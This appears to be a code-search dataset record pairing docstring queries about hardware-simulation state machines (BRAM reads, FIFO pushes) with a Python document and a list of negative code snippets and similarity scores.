"def store(self, state, act, rew, next_state):\n # buffer has to have room so you can store\n if self.ptr == self.max_size:\n self.state_buf.pop(0)\n self.act_buf.pop(0)\n self.rew_buf.pop(0)\n self.next_state_buf.pop(0)\n self.ptr -= 1\n\n # Environment related, subject to change\n # Old version\n #self.state_buf.append(np.expand_dims(state, axis = 0))\n #self.act_buf.append(np.expand_dims(act, axis = 0))\n #self.rew_buf.append(np.array(rew, ndmin = 1))\n #self.next_state_buf.append(np.expand_dims(next_state, axis = 0))\n\n # New version (best suited for decentralized)\n self.state_buf.append(state)\n self.act_buf.append(act)\n self.rew_buf.append(rew)\n self.next_state_buf.append(next_state)\n self.ptr += 1",
"def ingestState(self, data):\n # ignorant agents might not do anything with the state\n if not data:\n return\n\n args = struct.unpack('!ffffffB',data)\n \n self.gameState = GameState(args[0],args[1],args[2],args[3],args[4],args[5])\n self.gameState.parseFlags(args[6])",
"def test_io_in_out_loop(self):\n self.l.output(conf_io=0x1, state_io=0x0)\n for i in range(10):\n state_d, state_io, count = self.l.output(state_io=0x1)\n self.assertTrue(state_io & 0x2)\n state_d, state_io, count = self.l.output(state_io=0x0)\n self.assertTrue(not state_io & 0x2)",
"def push_sm(self):\r\n popped_data = 0\r\n\r\n while True:\r\n popped_data_valid = 0\r\n # wait to receive incoming data\r\n data = yield self.w_in_pipe.get()\r\n # model write latency\r\n #for i in range(self.write_latency):\r\n yield self.wait_sys_clks(self.write_latency)\r\n # first enque the item\r\n self.items.append(data)\r\n # then insert in the correct position and shift (sorting)\r\n #for i in range(self.shift_latency):\r\n yield self.wait_sys_clks(self.shift_latency)\r\n self.items.sort()\r\n if len(self.items) > self.maxsize : # Peixuan Q: what if len = maxsize, should we keep the data?\r\n popped_data = self.items.pop(len(self.items)-1)\r\n popped_data_valid = 1\r\n # indicate write_completion\r\n if self.w_out_pipe is not None:\r\n done = 1\r\n self.w_out_pipe.put((done, popped_data, popped_data_valid)) # tuple\r",
"def dump(self,out):\n if self.changed: raise StateError(_('Data changed: ')+ self.name)\n if not self.data: raise StateError(_('Data undefined: ')+self.name)\n out.write(struct.pack('4s3i',self.name,self.size,self.delFlag,self.recFlag))\n out.write(self.data)",
"def send_states(self,t=0,state=None, a=None,p=None, state_type='c'):\r\n if state == None:\r\n if state_type == 'd':\r\n state = self.grid_state\r\n else:\r\n state = self.real_state\r\n\r\n\r\n if a == None:\r\n a = self.action\r\n # find index of the action in action set\r\n a_ind = list(self.action_space).index(a)\r\n degree = self.degree\r\n id = self.id\r\n data = {0:id,1:t,2:a_ind,3:state,4:p,5:degree}\r\n txt = json.dumps(data)\r\n fp = open('w_buf.json','w')\r\n if fp.writable():\r\n fp.write(txt)\r\n else:\r\n print(\"Error: Fail to write Agent data\")\r\n fp.close()\r\n return False\r\n fp.close()\r\n return True",
"def get_states(self):\r\n self.msg_send_upr.data[0] = b\"\\x0f\"[0]\r\n self.send_and_flush(self.msg_send_upr)",
"def push_write(self, s):\n ...",
"def serialize(self, buff):\n try:\n _x = self.state_path\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.state_class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.initial_state_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(self.input_keys)\n buff.write(_struct_I.pack(length))\n for val1 in self.input_keys:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.output_keys)\n buff.write(_struct_I.pack(length))\n for val1 in self.output_keys:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.cond_outcome)\n buff.write(_struct_I.pack(length))\n for val1 in self.cond_outcome:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.cond_transition)\n buff.write(_struct_I.pack(length))\n for val1 in self.cond_transition:\n length = len(val1.state_name)\n buff.write(_struct_I.pack(length))\n for val2 in val1.state_name:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val2))\n length = len(val1.state_outcome)\n buff.write(_struct_I.pack(length))\n for val2 in val1.state_outcome:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val2))\n _x = self.behavior_class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(self.parameter_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.parameter_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.parameter_values)\n buff.write(_struct_I.pack(length))\n for val1 in self.parameter_values:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n buff.write(_get_struct_2f().pack(*self.position))\n length = len(self.outcomes)\n buff.write(_struct_I.pack(length))\n for val1 in self.outcomes:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.transitions)\n buff.write(_struct_I.pack(length))\n for val1 in self.transitions:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.autonomy)\n buff.write(_struct_I.pack(length))\n pattern = '<%sb'%length\n 
buff.write(struct.Struct(pattern).pack(*self.autonomy))\n length = len(self.userdata_keys)\n buff.write(_struct_I.pack(length))\n for val1 in self.userdata_keys:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n length = len(self.userdata_remapping)\n buff.write(_struct_I.pack(length))\n for val1 in self.userdata_remapping:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.Struct('<I%ss'%length).pack(length, val1))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))",
"def __state_cb(self, data):\n self.state = data",
"def peek_write(self):\n ...",
"def _serialize(self, state, handle):\n raise NotImplementedError",
"def update(self):\n self._state = read_input(self._port)",
"def send_states_v2(self,t, transition=None, p=None):\r\n\r\n data = {}\r\n data[\"id\"] =self.id\r\n data[\"t\"] =round(t,1)\r\n data[\"d\"] =self.degree\r\n if p != None:\r\n data[\"p\"] = p\r\n\r\n if transition != None:\r\n data[\"s\"] = np.round(transition[0],2).tolist()\r\n data[\"a\"] = list(self.action_space).index(transition[1])\r\n data[\"sn\"] = np.round(transition[2],2).tolist()\r\n txt = json.dumps(data)\r\n fp = open('w_buf_1.json','w')\r\n if fp.writable():\r\n fp.write(txt)\r\n print(\"Wrote Params. \")\r\n else:\r\n print(\"Error: Fail to write Agent data\")\r\n fp.close()\r\n return False\r\n fp.close()\r\n return True",
"def transfer_data(self):\n pass",
"def step(self,inp): ## function responsible for exciting the machine with a SINGLE INPUT VALUE\n (s, o) = self.getNextValues(self.state,inp)\n # will store the state and return the output\n self.state =s\n return o",
"def __getstate__(self):\n return (dumps(self.stdin), dumps(self.stdout), dumps(self.stderr))",
"def forward(self, inputs, prev_state):\n\n # get interface vectors\n erase_vector = self.sigmoid(self.erase_vectors(inputs))\n write_gate = self.sigmoid(self.write_gate(inputs))\n write_vector = self.write_vectors(inputs)\n read_keys = self.read_keys(inputs)\n read_strengths = self.softplus(self.read_strengths(inputs))\n write_vector = write_vector.view(-1, self.num_write_heads, self.num_cols)\n erase_vector = erase_vector.view(-1, self.num_write_heads, self.num_cols)\n read_keys = read_keys.view(-1, self.num_read_heads, self.num_cols)\n\n # write memory\n usage = self._update_usage(prev_state['usage'], prev_state['write_weights'])\n write_weights = self._write_weights(write_gate, usage)\n updated_memory = self._erase_and_write(prev_state['memory'], write_weights, write_vector, erase_vector)\n # read memory based only on content lookup\n read_weights = self.content_attention(prev_state['memory'], read_keys, read_strengths)\n read_vectors = torch.matmul(read_weights, updated_memory)\n memory_state = {\n 'memory': updated_memory,\n 'write_weights': write_weights,\n 'read_weights': read_weights,\n 'usage': usage\n }\n return read_vectors, memory_state",
"def savestate(self, state):\n pass",
"def recv_maintain(self):\n while True:\n # maintain the state list size\n while len(self.state_list) > self.state_list_size:\n self.state_list = self.state_list[(len(self.state_list) - self.state_list_size):]\n\n # read from socket, decode the message, and append to state buffer\n try:\n mesg = self.sock.recv(1024).decode()\n time.sleep(1/self.recv_rate)\n except socket.error as e:\n err = e.args[0]\n # no data in buffer for non-blocking socket to copy\n if err == errno.EAGAIN or err == errno.EWOULDBLOCK:\n mesg = None\n # other error occurs\n else:\n sys.exit(1)\n else:\n self.state_buf_str += mesg\n update_state = self.state_str_parse()\n if update_state is not None:\n for state in update_state:\n self.state_list.append(state)\n update_state = None",
"def store(self, state, action, reward, next_state, done):\n self.replay_memory.append((state, action, reward, next_state, done))",
"def idle(self):\n\n logging.info('writing idle shm')\n self.shm_command.write({'cmd': 'idle', 'data': {}})",
"def stream_state_changed(self,state,arg):\n pass",
"def writeInput(self):\n\n #self.collect.writeInput()",
"def _send_data_to_nn(self,wbtData):\n\t\tself._neuralNetwork.stdin.write(\"COMM IN\\n\") # this shitty COMM IN is not really needed..to modify in closedloop.py\n\t\tself._neuralNetwork.stdin.write(wbtData)",
"def _add_io_state(self, state):\n if self._state != state:\n state = self._state = self._state | state\n self._update_handler(self._state)",
"def stdin_read(self, data):\n self.write_master(data)"
] |
[
"0.59692395",
"0.5955333",
"0.58689207",
"0.5767663",
"0.5702709",
"0.57007813",
"0.5687097",
"0.5678996",
"0.56627923",
"0.56499904",
"0.5644262",
"0.5623464",
"0.5596828",
"0.55803",
"0.5578878",
"0.55625767",
"0.5532469",
"0.5525875",
"0.5517828",
"0.54954076",
"0.5493518",
"0.54644644",
"0.5458587",
"0.54581344",
"0.54400355",
"0.54370046",
"0.5425097",
"0.5422503",
"0.540764",
"0.53980434"
] |
0.6438711
|
0
|
State machine to read data from memory
|
def read_sm(self):
while True:
# wait to receive a read request
addr = yield self.r_in_pipe.get()
# model read latency
#for i in range(self.read_latency):
yield self.wait_sys_clks(self.read_latency)
# try to read data from memory
if addr in self.mem.keys():
data = self.mem[addr]
else:
print >> sys.stderr, "ERROR: BRAM read_sm: specified address {} is out of range".format(addr)
data = None
self.rd_count += 1
# write data back
self.r_out_pipe.put(data)
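# Illustrative client-side sketch (assumption: SimPy-style pipes, mirroring
# the request/response pattern used above; names are not from the source):
#     r_in_pipe.put(addr)                  # issue a read request
#     data = yield r_out_pipe.get()        # wait for the returned data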
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def load_state(self):\n return self.state.read()",
"def _read_data(self):",
"def read():\n # TODO",
"def readState(self, saveState: ghidra.framework.options.SaveState) -> None:\n ...",
"def read( self, store ):\n\t\tassert 1<=store<=2, \"Can only read data to store 1 or 2\"\n\t\tdata = self.mpr.touched()\n\t\tfor i in range( 12 ):\n\t\t\tself.touched[i+(store-1)*12] = 1 if data & (1<<i) else 0",
"def readData(self, key, context):\n\n print(\"key: {}\".format(key))\n address = _make_benchcontract_address(\"key_{}\".format(key))\n print(\"address: {}\".format(address))\n data = context.get_state(\n [address],\n timeout=self.timeout)\n print(\"readData obtained {} --> {} from state\".format(key, data[\"data\"]))\n return 0",
"def read(self):",
"def read(self, sacc_data: sacc.Sacc) -> None:",
"def read(self, sacc_data: sacc.Sacc) -> None:",
"def read(self, sacc_data: sacc.Sacc) -> None:",
"def _get_state(self):",
"def read(self):\n pass",
"def read_memory(self, address):\n address = address & 0xFFFF\n if address in self.breads:\n self.paused = True\n self.pause_reason = 'Read at ' + hex(address)\n return self.memory.ReadMemory(self, address)",
"def _read(self):\n return np.copy(self.memory[self.head_pos])",
"def read_data(self):\n raise NotImplementedError",
"def Read(self):\n if not self._mem: return self.data\n\n logger.info(\"Read %s\" % self)\n self.data = self.hostmemmgr.read(self._mem, self.size)\n\n logger.info(\"=\" * 30, \"READ BUFFER\", \"=\" * 30)\n scapyfactory.Parse(self.data).Show()\n logger.info(\"=\" * 30, \"END READ BUFFER\", \"=\" * 30)\n\n return self.data",
"def read_state(self):\n #build a list of 0x00 bytes to send through shift registers\n #existing data will be read as zeros are shifted in\n all_zeros = []\n for i in range(self.num_registers):\n all_zeros.append(0x00)\n\n #shift in the 0x00 data in order to read current data\n shift_reg_bytes = self.e.write_SPI_bytes_to_portA(all_zeros)\n\n #write the current data back into the shift registers\n self.e.write_SPI_bytes_to_portA(shift_reg_bytes)\n\n shift_reg_bytes.reverse()\n return shift_reg_bytes",
"def memory_read(self, addr: str) -> Byte:\n print(f\"memory read {addr}\")\n _parsed_addr = self._parse_addr(addr)\n if _parsed_addr:\n return _parsed_addr.read(addr)\n data = self.memory.read(addr)\n return data",
"def read(self):\n raise NotImplementedError",
"def read_machine_state():\n with open(DUMP_FILE) as f:\n lines = f.read().split('\\n')[1:-1]\n result = []\n for line in lines:\n expr = re.search(':(.*)==', line)\n if expr:\n expr = expr.group(1)\n expr = expr.replace(' ', '').replace('\\t', '')\n expr = expr.replace('i', 'j')\n expr = expr.replace('+-', '-')\n result.append(complex(expr))\n return np.array(result)",
"def readState(f: TextIOWrapper) -> StateNode:\n table = []\n line = f.readline().strip()\n while len(line) > 0:\n table.append(line)\n line = f.readline().strip()\n line_lengths = [len(x) for x in table]\n\n # print(\"Table: \", table)\n # print(\"Lengths of table: \", line_lengths)\n\n if len(table) == 0:\n raise ValueError(\"State is missing first line of data!\")\n if min(line_lengths) != max(line_lengths):\n raise ValueError(\"State doesn't have all lines of equal size!\")\n return StateNode(\n table, \n (list(range(len(table))), list(range(len(table[0])))), \n ([], []), \n 0, \n None\n )",
"def read(self):\n return self.data[self.pointer]",
"def readData(self):\n if (self.model == 'GDS'):\n self.write(':ACQ'+str(ch)+':MEM?\\n')\n elif (self.model == 'TDS'):\n self.write('CURVe?\\n')\n\n # Check for the initial '#'; if not present, raise error.\n if (self.read(1) != '#'):\n raise Exception, \"Expected header not present\"\n\n # Read the data length indicator\n dataSize = int(self.read(int(self.read(1))))\n\n # extra steps for GDS\n if (self.model == 'GDS'):\n # subtract the 8 bytes we will read.\n dataSize -= 8\n # Read the sampling period\n hstep = struct.unpack('>f', self.read(4))[0]\n # also, fix hoff so it corresponds with that for TDS\n # FIXME: check with the scope at some point.\n hoff = hoff - float(dataSize/4) * hstep\n # Read 4 bytes to advance to the actual data: first byte\n # contains the channel and the three are not used,\n # according to the GDS800 manual.\n self.read(4)\n \n # Read data; TDS expects a 1-byte data, GDS expects 2-byte one.\n if (self.model == 'TDS'):\n data = list(struct.unpack('>'+str(dataSize)+'b',\n self.read(dataSize)))\n # TDS has a trailing '\\n' that should be drained.\n self.read(1)\n elif (self.model == 'GDS'):\n data = list(struct.unpack('>'+str(dataSize/2)+'h',\n self.read(dataSize)))\n\n return data",
"def fromState(state):",
"def readMuchData(self, len, start, context):\n\n print(\"start: {}\".format(start))\n print(\"end: {}\".format(start + len))\n\n sum = 0\n\n for i in range(start, start + len):\n try:\n key = \"key_{}\".format(i)\n address = _make_benchcontract_address(key)\n print(\"address: {}\".format(address))\n except:\n print(\"Some error\")\n\n try:\n data = context.get_state(\n [address],\n timeout=self.timeout)\n print(\"Data: {}\".format(data))\n value = int(data[\"data\"])\n print(\"Obtained {} --> {} from state\".format(key, value))\n # sum = sum + value\n except:\n print(\"No entry found for {}\".format(key))\n\n print(\"total sum: {}\".format(sum))",
"def _load_state(self, state):\n self._array, self._turn, self._score = state",
"def read(self, source):\n raise NotImplementedError( 'Needs implementation' )",
"def read_memory(self, address):\n\n return self.memory[address]",
"def read(self):\n pass",
"def read(self, addr):\n if addr < len(self.RAM):\n return self.RAM[addr]"
] |
[
"0.660556",
"0.63064694",
"0.63053113",
"0.6188742",
"0.61747855",
"0.6130439",
"0.60419524",
"0.60233593",
"0.60233593",
"0.60233593",
"0.59958494",
"0.59445846",
"0.5923876",
"0.5904313",
"0.58931416",
"0.5835286",
"0.5792846",
"0.5786805",
"0.57863224",
"0.5784955",
"0.5701061",
"0.56542075",
"0.5645067",
"0.5640805",
"0.56225735",
"0.56097925",
"0.5600275",
"0.55782944",
"0.5558536",
"0.5556932"
] |
0.6485029
|
1
|
State machine to push incoming data into the FIFO
|
def push_sm(self):
while True:
# wait to receive incoming data
data = yield self.w_in_pipe.get()
# model write latency
#for i in range(self.write_latency):
yield self.wait_sys_clks(self.write_latency)
# try to write data into FIFO
if len(self.items) < self.maxsize:
self.items.append(data)
else:
print >> sys.stderr, "ERROR: FIFO push_sm: FIFO full, cannot push {}".format(data)
# indicate write_completion
if self.w_out_pipe is not None:
done = 1
self.w_out_pipe.put(done)
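# Illustrative client-side sketch (assumption: SimPy-style pipes, mirroring
# the request/response pattern used above; names are not from the source):
#     w_in_pipe.put(data)                  # push one word into the FIFO
#     done = yield w_out_pipe.get()        # wait for the completion flag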
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def push_sm(self):\r\n popped_data = 0\r\n\r\n while True:\r\n popped_data_valid = 0\r\n # wait to receive incoming data\r\n data = yield self.w_in_pipe.get()\r\n # model write latency\r\n #for i in range(self.write_latency):\r\n yield self.wait_sys_clks(self.write_latency)\r\n # first enque the item\r\n self.items.append(data)\r\n # then insert in the correct position and shift (sorting)\r\n #for i in range(self.shift_latency):\r\n yield self.wait_sys_clks(self.shift_latency)\r\n self.items.sort()\r\n if len(self.items) > self.maxsize : # Peixuan Q: what if len = maxsize, should we keep the data?\r\n popped_data = self.items.pop(len(self.items)-1)\r\n popped_data_valid = 1\r\n # indicate write_completion\r\n if self.w_out_pipe is not None:\r\n done = 1\r\n self.w_out_pipe.put((done, popped_data, popped_data_valid)) # tuple\r",
"def pop_sm(self):\r\n while True:\r\n # wait to receive a read request\r\n req = yield self.r_in_pipe.get()\r\n # model read latency\r\n #for i in range(self.read_latency):\r\n yield self.wait_sys_clks(self.read_latency)\r\n # try to read head element\r\n if len(self.items) > 0:\r\n data = self.items[0]\r\n self.items = self.items[1:]\r\n else:\r\n print >> sys.stderr, \"ERROR: FIFO pop_sm: attempted to read from empty FIFO\"\r\n data = None\r\n # write data back\r\n self.r_out_pipe.put(data)",
"def start():\n global receivers\n global __FIFO_CMD__, __FIFO_DAT__\n\n fd = os.open(__FIFO_DAT__, os.O_RDONLY)\n def callback_dat(fd_):\n \"\"\" Callback for the receiving DATA. \"\"\"\n # receive data\n data = os.read(fd_, 8)\n if data == '':\n return\n data, = struct.unpack('<Q', data)\n # TODO: Interpret data\n __recv_notifier__ = LambdaQSocketNotifier(fd, QSocketNotifier.Read, callback_dat)\n\n while True:\n ask_and_send_command()",
"def rw_pifo_sm(self):\r\n data_words = random.sample(range(0, 20), 20)\r\n\r\n # push all data\r\n for word in data_words:\r\n print ('@ {:04d} - pushed data word {}'.format(self.env.now, word))\r\n self.pifo_w_in_pipe.put(word)\r\n ((done, popped_data, popped_data_valid)) = yield self.pifo_w_out_pipe.get() # tuple\r\n if popped_data_valid:\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, popped_data))\r\n \r\n\r\n # pop all items\r\n for i in range(min(self.pifo_maxsize,len(data_words))):\r\n # submit pop request (value in put is a don't care)\r\n self.pifo_r_in_pipe.put(1) \r\n word = yield self.pifo_r_out_pipe.get()\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, word))",
"def handleIncoming(self):\r\n\t\trawQueue = list()\r\n\r\n\t\twhile True:\r\n\t\t\tif not self.activeConnection:\r\n\t\t\t\ttime.sleep(.1)\r\n\t\t\t\tcontinue\r\n\t\t\ttry:\r\n\t\t\t\trawQueue.append(self.serialPort.read(1).decode('ascii'))\r\n\t\t\texcept serial.serialutil.SerialException as e:\r\n\t\t\t\tcontinue\r\n\t\t\t# print(rawQueue[-1], int.from_bytes(rawQueue[-1], byteorder='big'))\r\n\t\t\t# if len(rawQueue) >= 1000:\r\n\t\t\t# \trawQueue.pop(0)\r\n\t\t\t# print(rawQueue)\r\n\t\t\tif rawQueue[0] != '$': # we pop items until the first one is a $ sign\r\n\t\t\t\t# print('popping the first character')\r\n\t\t\t\trawQueue.pop(0)\r\n\t\t\tif '\\n' in rawQueue: # we assume with the \\n we have a valid message\r\n\t\t\t\t# print('valid message')\r\n\t\t\t\trawQueue.pop(0) # remove the $\r\n\t\t\t\trawPayload = rawQueue[0:rawQueue.index(\"*\")]\r\n\t\t\t\tstringPayload = \"\".join(rawPayload)\r\n\t\t\t\tvalueList = stringPayload.split(\",\")\r\n\t\t\t\t# print(valueList)\r\n\t\t\t\tfor i in range(1, len(valueList)):\r\n\t\t\t\t\tvalueList[i] = int(valueList[i])\r\n\t\t\t\tvalueList[0] = messageTypes[valueList[0]]\r\n\r\n\t\t\t\tself.eventQueue.put(valueList)\r\n\t\t\t\trawQueue.clear()\r\n\t\t\t\t# print(valueList)\r\n\t\t\t\t# we are going to ignore checksums for now\r",
"def push_data(self, data):\n self.incoming.write(data)",
"def consumer(state: SharedState):",
"def push(self,transition):\n \n input_to_buffer = transpose_list(transition)\n \n for item in input_to_buffer:\n self.deque.append(item)",
"def processIncoming(self):\n while self.queue.qsize():\n try:\n # print 'queue'\n msg = self.queue.get(0)\n # Check contents of message and do what it says\n # As a test, we simply print it\n if msg == \"exit\":\n self.deviceError()\n if msg == \"error\":\n self.deviceError()\n else:\n self.decode(msg)\n except Queue.Empty:\n pass",
"def _flow_in(self):\n print(\"MESSENGER: flow_in online!\")\n while self.running:\n data = b\"\"\n while data[-5:] != b\"ROGER\" and self.running:\n try:\n slc = self.sock.recv(1024)\n except socket.timeout:\n time.sleep(0.1)\n except socket.error as E:\n print(\"MESSENGER: caught socket exception:\", E)\n self.teardown(1)\n except Exception as E:\n print(\"MESSENGER: generic exception:\", E)\n self.teardown(1)\n else:\n data += slc\n if not self.running:\n if data:\n print(\"MESSENGER: data left hanging:\" + data[:-5].decode(\"utf8\"))\n return\n data = data[:-5].decode(\"utf8\")\n self.recvbuffer.extend(data.split(\"ROGER\"))\n print(\"MESSENGER: flow_in exiting...\")",
"def read_incoming(self):\r\n buf = ''\r\n debug_prompt = re.compile(r'\\A[\\w]+>>? ')\r\n while 1:\r\n try:\r\n buf += os.read(self.fid, 100).decode('utf8')\r\n except:\r\n self.queue.put(None)\r\n return\r\n lines = buf.splitlines()\r\n for line in lines[:-1]:\r\n self.queue.put(line)\r\n if buf.endswith('\\n'):\r\n self.queue.put(lines[-1])\r\n buf = ''\r\n elif re.match(debug_prompt, lines[-1]):\r\n self.queue.put(lines[-1])\r\n buf = ''\r\n else:\r\n buf = lines[-1]",
"def push(self, data):\n node = OneWayNode(data)\n self.__head = node\n node.set_next(self.__head)\n self.__size += 1",
"def handle_input(self):\n difference = self.check_state()\n if not difference:\n return\n self.events = []\n self.handle_new_events(difference)\n self.update_timeval()\n self.events.append(self.sync_marker(self.timeval))\n self.write_to_pipe(self.events)",
"def __init__(self):\r\n self.queue = []\r\n self.current = False",
"def push(self, data):\n sabs = self.ac_out_buffer_size\n if len(data) > sabs:\n for i in xrange(0, len(data), sabs):\n self.producer_fifo.append(data[i:i+sabs])\n else:\n self.producer_fifo.append(data)\n self.initiate_send()",
"def on_receive(self):\n self.state = RECEIVED",
"def collect_incoming_data(self, data):\n self.__input.append(data)",
"def stream_state_changed(self,state,arg):\n pass",
"def push(self, transition, *args, **kwargs):\n raise NotImplementedError",
"def __init__(self,size=10):\n \n self.inbound = Queue() #an internal queue to manage the class properly in a thread safe manner.\n self.index = Value('i',0) #index of next item to be added.\n self.manager = Manager()\n \n self.buffer = self.manager.list() #the buffer we will store things in.\n self.size = size #the maximum size of the buffer\n self.newitem = Queue() #a blocking event to control the pop method\n t = threading.Thread(target=self.worker) #the worker that will run when items are added.\n t.start() #start the worker\n self.newitemindex = 0 #index of items to pop",
"def enqueue(self, data, flag='process'):\n self.Q['in'].put((data, flag))",
"def processIncoming(self):\n while (self.queue.qsize()):\n try:\n message = self.queue.get_nowait()\n \n self.terminal.insert(END,message)\n\n # Autoscroll the terminal if set\n if (self.autoscroll_value.get()):\n self.terminal.yview(END)\n\n except Queue.Empty:\n pass",
"def run(self):\n init()\n list_name = comet_config.REDIS_NAMESPACE + \"incoming/\" + self.service_name\n list_name_processing = list_name + \"/processing\"\n self.redis = r\n while True:\n try:\n item = self.redis.brpoplpush(list_name, list_name_processing)\n self.process_incoming(item)\n self.redis.lrem(list_name_processing, item)\n\n except redis.ConnectionError:\n pass",
"def pop_sm(self):\r\n while True:\r\n # wait to receive a read request\r\n req = yield self.r_in_pipe.get()\r\n # model read latency\r\n # for i in range(self.read_latency):\r\n yield self.wait_sys_clks(self.read_latency)\r\n # try to read head element\r\n if len(self.items) > 0:\r\n data = self.items[0]\r\n self.items = self.items[1:]\r\n else:\r\n print >> sys.stderr, \"ERROR: PIFO pop_sm: attempted to read from empty PIFO\"\r\n data = None\r\n # write data back\r\n self.r_out_pipe.put(data)",
"def push_write(self, s):\n ...",
"def processIncoming(self):\r\n while self.queue.qsize():\r\n try:\r\n volume_T101 = self.queue.get(0)\r\n self.var_pb_progress.set(volume_T101/100) #scale to 100\r\n self.var_T101.set(\"T101: \" + str(round(volume_T101,4)))\r\n self.var_LIT101.set(self.take_reading(volume_T101))\r\n self.update_physical(volume_T101)\r\n self.PLC_command()\r\n self.check_attack(volume_T101)\r\n self.output_results()\r\n self.master.update_idletasks()\r\n except queue.Empty:\r\n pass",
"def state_publisher(self):\n rospy.Subscriber('roc_command', CommandMsg, self.receive_command)\n rospy.Subscriber('joint_states', JointState, self.update_current_joint_states)\n\n pub = rospy.Publisher('joint_command', JointState, queue_size=10)\n rate = rospy.Rate(100) # 100hz\n\n while not rospy.is_shutdown():\n \"\"\"Reading the msg with the motion and command should be done here should be done here in a loop\n for now will be hard coded\n \"\"\"\n # wait for queue to have an item\n current_movement = self.queue.get()\n if not current_movement:\n continue\n\n joint_name_list, joint_goal_position_list, joint_duration_list = self.get_motion_from_movement(current_movement)\n joint_current_position_list = list() # TODO: Why resetting the joint positions?\n for joint_name in joint_name_list:\n joint_current_position_list.append(\n self.joint_current_positions[self.joint_names.index(joint_name)])\n\n \"\"\"Sort the arrays based on the shortest executionary motion till the longest\n \"\"\"\n joint_name_list = [x for (y, x) in sorted(zip(joint_duration_list, joint_name_list))]\n joint_current_position_list = [x for (y, x) in\n sorted(zip(joint_duration_list, joint_current_position_list))]\n joint_goal_position_list = [x for (y, x) in sorted(zip(joint_duration_list, joint_goal_position_list))]\n joint_duration_list = sorted(joint_duration_list)\n max_duration = max(joint_duration_list)\n\n linear_trajectory = list()\n # compute the trajectory equivelance\n for i in range(0, len(joint_name_list)):\n for j in range(0, len(joint_name_list) + 1):\n # if first position, then simply add current position\n if j == 0:\n linear_trajectory.append([joint_current_position_list[i]])\n print(\"trajectory:\", linear_trajectory)\n else:\n # Compute the scaling factor of every motion in comparison to the other.\n scaling_factor = 1.0\n if joint_duration_list[j - 1] / joint_duration_list[i] < 1:\n print(joint_duration_list[j - 1], joint_duration_list[i])\n scaling_factor = float(joint_duration_list[j - 1]) / joint_duration_list[i]\n print(scaling_factor)\n linear_trajectory[i].append(\n ((joint_goal_position_list[i] - joint_current_position_list[i]) * scaling_factor) +\n joint_current_position_list[i])\n print(\"trajectory:\", linear_trajectory)\n print(joint_duration_list)\n\n tau, smoothed_trajectory = self.motion_smoother(linear_trajectory, joint_duration_list)\n plt.plot(linear_trajectory[0], linear_trajectory[1], 'x', smoothed_trajectory[0],\n smoothed_trajectory[1], 'b')\n plt.show()\n\n for i in range(0, len(tau)):\n cmd = JointState()\n cmd.header.stamp = rospy.get_rostime()\n cmd.name = joint_name_list\n cmd.position = [smoothed_trajectory[0][i], smoothed_trajectory[1][i]]\n cmd.velocity = []\n cmd.effort = []\n pub.publish(cmd)\n rate.sleep()",
"def __init__(self):\n self.push_queue = []\n self.pop_queue = []",
"def push(self, *args, **kwargs):\n pass",
"def push(self, state, action, reward, next_state):\n\n to_add = [state, action, reward, next_state]\n if len(self.buffer) < self.capacity:\n self.buffer.append(None)\n self.buffer[self.position] = self.transition(*to_add)\n self.position = int((self.position + 1) % self.capacity)"
] |
[
"0.6671598",
"0.62894833",
"0.6145731",
"0.61236733",
"0.60589486",
"0.5953796",
"0.5827482",
"0.5810255",
"0.57340187",
"0.5702618",
"0.56995225",
"0.56634825",
"0.5663189",
"0.5631365",
"0.5625704",
"0.5597995",
"0.559065",
"0.5590326",
"0.55785394",
"0.55777264",
"0.5564686",
"0.5559531",
"0.5551272",
